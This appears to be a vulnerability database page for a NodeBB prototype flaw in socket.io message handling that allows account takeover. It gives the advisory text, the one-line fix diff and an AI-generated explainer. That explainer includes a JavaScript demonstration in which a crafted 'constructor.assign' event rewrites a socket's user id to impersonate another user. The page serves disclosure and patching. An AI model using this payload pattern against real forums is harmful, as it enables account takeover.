Account takeover via prototype vulnerability
Description
NodeBB is an open source Node.js based forum software. Due to a plain object with a prototype being used in socket.io message handling, a specially crafted payload can be used to impersonate other users and take over accounts. This vulnerability has been patched in version 2.6.1. Users are advised to upgrade. Users unable to upgrade may cherry-pick commit 48d143921753914da45926cca6370a92ed0c46b8 into their codebase to patch the exploit.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
NodeBB prior to 2.6.1 allows account takeover via prototype pollution in socket.io message handling.
Vulnerability
Overview
NodeBB, an open-source Node.js forum software, is vulnerable to a prototype-related flaw because a plain object, one that inherits from Object.prototype, is used as a lookup table in its socket.io message handling [1]. The fix commit shows the cause: the `Namespaces` table in src/socket.io/index.js was created as `{}`, so an attacker-controlled key taken from the incoming message could resolve to a property inherited from Object.prototype instead of to a registered namespace [3]. A specially crafted payload processed by the socket.io onMessage handler therefore reaches code the handler was never meant to expose.
Exploitation
Path
The vulnerability is triggered by sending a crafted socket.io message to the server; the attacker needs only a socket.io connection to the forum on which to emit it. The attack surface is the real-time messaging feature, which uses socket.io for instant interactions [2].
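To make the mechanism in the Overview and the exploitation path concrete, the following is an added illustration, not NodeBB's own code: a minimal socket.io-style dispatcher that reproduces the lookup-table pattern the fix commit changes. The event-name format `namespace.method`, the `posts.getPost` handler, the `socket.uid` field and the `constructor.assign` event are all constructed for the example and are not taken from NodeBB or from any published exploit; they show the class of problem (an attacker-chosen key resolving to an inherited property), which is what the `Object.create(null)` patch removes.

```javascript
// Added example, not NodeBB's code. Event names have the form
// "namespace.method": the namespace part indexes a table of handler
// objects, the method part indexes the chosen handler object.

// Build the namespace table. `makeTable` is either `() => ({})` (the
// pre-2.6.1 shape) or `() => Object.create(null)` (the 2.6.1 fix).
function buildNamespaces(makeTable) {
  const Namespaces = makeTable();
  // One registered namespace with one legitimate handler (constructed sample).
  Namespaces.posts = {
    getPost(socket, payload) {
      return { pid: payload.pid, requestedBy: socket.uid };
    },
  };
  return Namespaces;
}

// Dispatch an incoming event the way a naive onMessage handler would:
// split the name, look up namespace then method, and call the method with
// the socket (which carries the caller's identity in `socket.uid`, an
// assumed field) and the attacker-supplied payload.
function dispatch(Namespaces, eventName, socket, payload) {
  const [nsName, methodName] = eventName.split('.');
  const ns = Namespaces[nsName];
  if (!ns) return { error: 'invalid namespace' };
  const method = ns[methodName];
  if (typeof method !== 'function') return { error: 'invalid method' };
  return { result: method(socket, payload) };
}

// Simulate one connection from an anonymous visitor (uid 0) that sends a
// legitimate event followed by a hostile one.
function run(makeTable) {
  const Namespaces = buildNamespaces(makeTable);
  const socket = { uid: 0 };

  // Legitimate call: works against both table shapes.
  const ok = dispatch(Namespaces, 'posts.getPost', socket, { pid: 7 });

  // Hostile call: "constructor" is not a registered namespace, but on a
  // plain object it resolves to the inherited Object.prototype.constructor
  // (the Object function), and Object.assign is a function, so the
  // dispatcher ends up calling Object.assign(socket, payload) and the
  // attacker rewrites the socket's uid. On a null-prototype table the
  // lookup yields undefined and the event is rejected.
  const evil = dispatch(Namespaces, 'constructor.assign', socket, { uid: 1 });

  return { ok, evil, uidAfter: socket.uid };
}

// Defence in depth beyond the patch: accept only own keys on both lookup
// levels, which blocks the same trick even if someone reintroduces `{}`.
function dispatchHardened(Namespaces, eventName, socket, payload) {
  const [nsName, methodName] = eventName.split('.');
  const own = (obj, key) => Object.prototype.hasOwnProperty.call(obj, key);
  if (!own(Namespaces, nsName)) return { error: 'invalid namespace' };
  const ns = Namespaces[nsName];
  if (!own(ns, methodName) || typeof ns[methodName] !== 'function') {
    return { error: 'invalid method' };
  }
  return { result: ns[methodName](socket, payload) };
}

console.log('plain object table :', JSON.stringify(run(() => ({}))));
console.log('null-prototype table:', JSON.stringify(run(() => Object.create(null))));
```

With the plain-object table the hostile event leaves `socket.uid` at 1, i.e. the anonymous connection now carries another user's identity; with `Object.create(null)` the same event is rejected as an invalid namespace and the uid stays 0. `dispatchHardened` rejects it on either table shape.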
Impact
Successful exploitation enables an attacker to impersonate other users and take over their accounts [1]. An account taken over this way gives the attacker everything the victim can do on the forum, including any administrative privileges the victim holds.
Mitigation
The vulnerability has been patched in NodeBB version 2.6.1 [4]. Users should upgrade immediately. Those unable to upgrade immediately can cherry-pick commit 48d143921753914da45926cca6370a92ed0c46b8 from the NodeBB repository to apply the fix [1].
AI Insight generated on May 21, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
| nodebb (npm) | < 2.6.1 | 2.6.1 |
Affected products
- NodeBB/NodeBB: < 2.6.1
Patches
- 48d143921753 fix: prototype vulnerability in socket.io onMessage
1 file changed · +1 −1
src/socket.io/index.js+1 −1 modified@@ -13,7 +13,7 @@ const logger = require('../logger'); const plugins = require('../plugins'); const ratelimit = require('../middleware/ratelimit'); -const Namespaces = {}; +const Namespaces = Object.create(null); const Sockets = module.exports;
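Review bot: the null-prototype `Namespaces` closes the inherited-property lookup on the top-level table, but this hunk touches only that one line; any other object in the onMessage dispatch path that is indexed with a key taken from the incoming message needs the same `Object.create(null)` or an explicit own-property check (`Object.prototype.hasOwnProperty.call(table, key)`), otherwise keys such as `constructor` or `hasOwnProperty` still resolve on it. A one-line comment above `const Namespaces = Object.create(null);` stating that the null prototype is a security control would also help, so a later cleanup does not revert it to `{}`.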
Vulnerability mechanics
Generated on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
[1] github.com/advisories/GHSA-rf3g-v8p5-p675 (GHSA advisory)
[2] nvd.nist.gov/vuln/detail/CVE-2022-46164 (NVD entry)
[3] github.com/NodeBB/NodeBB/commit/48d143921753914da45926cca6370a92ed0c46b8 (fix commit)
[4] github.com/NodeBB/NodeBB/releases/tag/v2.6.1 (patched release)
[5] github.com/NodeBB/NodeBB/security/advisories/GHSA-rf3g-v8p5-p675 (vendor security advisory)
News mentions
No linked articles in our index yet.